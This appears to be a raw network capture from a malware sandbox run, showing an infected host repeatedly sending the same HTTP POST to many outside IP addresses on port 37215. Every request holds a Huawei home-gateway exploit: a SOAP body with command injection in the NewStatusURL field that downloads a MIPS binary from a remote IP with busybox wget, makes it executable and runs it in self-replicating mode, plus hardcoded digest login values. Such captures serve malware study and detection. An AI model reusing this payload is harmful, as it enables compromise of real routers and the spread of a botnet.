                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.476092100 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    36192.168.2.144561641.197.151.23137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.115720034 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.476092100 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    37192.168.2.1454242164.106.102.19437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.116363049 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.466916084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    38192.168.2.1435990197.215.53.25337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.116364002 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.473573923 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    39192.168.2.145327841.195.22.23637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.116364002 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.473573923 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    40192.168.2.1460670197.190.231.22937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.116791010 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
